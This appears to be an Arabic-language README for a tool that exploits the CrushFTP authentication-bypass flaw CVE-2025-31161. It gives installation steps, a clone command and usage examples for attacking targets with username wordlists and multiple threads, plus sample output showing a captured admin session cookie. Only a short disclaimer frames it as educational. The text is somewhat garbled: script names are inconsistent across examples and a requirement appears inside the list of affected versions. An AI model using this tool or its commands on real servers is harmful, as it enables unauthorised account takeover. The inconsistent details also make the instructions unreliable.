
أداة استغلال CrushFTP CVE-2025-31161 🔓
CVE-2025-31161 هي ثغرة حرجة في تجاوز المصادقة في واجهة الويب الخاصة بـ CrushFTP. من خلال التلاعب بحقل ترويسة Authorization في HTTP، يمكن لمهاجم غير مصادَق الحصول على وصول كامل تحت أي اسم مستخدم صالح دون توفير كلمة المرور الصحيحة.
الإصدارات المتأثرة
CrushFTP 9.3.8
CrushFTP 9.3.9
CrushFTP 9.3.10
CrushFTP 9.3.11
CrushFTP 9.3.12
إصدارات CrushFTP Enterprise قبل 9.3.12.5
Python 3.8+
الحزم المطلوبة:
pip install requests colorama urllib3
pip install requests colorama urllib3
git clone https://github.com/TX-One/CVE-2025-31161.git
cd CVE-2025-31161
python3 tx-crush.py -h
python3 CVE-2025-31161.py -t https://target:8080 -u users.txt -o results.json
-h, --help عرض رسالة المساعدة والخروج
-t, --target TARGET عنوان الهدف (مثال: https://example.com:8080)
-u, --users USERS ملف يحتوي على قائمة أسماء المستخدمين
-o, --output OUTPUT ملف JSON للإخراج
-T, --threads THREADS
عدد الخيوط (الافتراضي: 5)
--no-ssl تعطيل التحقق من SSL
--timeout TIMEOUT مهلة الطلب (الافتراضي: 15)
--retries RETRIES عدد مرات إعادة المحاولة (الافتراضي: 3)
--force تجاوز فحص الإصدار
python3 exploit.py
-t https://vulnerable-server.com:8000
-u ./wordlists/common_users.txt
-o ./results/compromised.json
-T 10
--retries 5
--timeout 20
[
{
"target": "https://victim:8080",
"user": "admin",
"success": true,
"method": "Bearer",
"cookies": {"sessionID": "a1b2c3..."},
"server_version": "CrushFTP/9.3.12"
}
]
[
{
"target": "http://victim:8080",
"user": "admin",
"success": false
}
]
إخلاء مسؤولية: هذا المشروع مخصص للأغراض التعليمية وبحوث الأمن فقط. الاستخدام المسؤول مطلوب.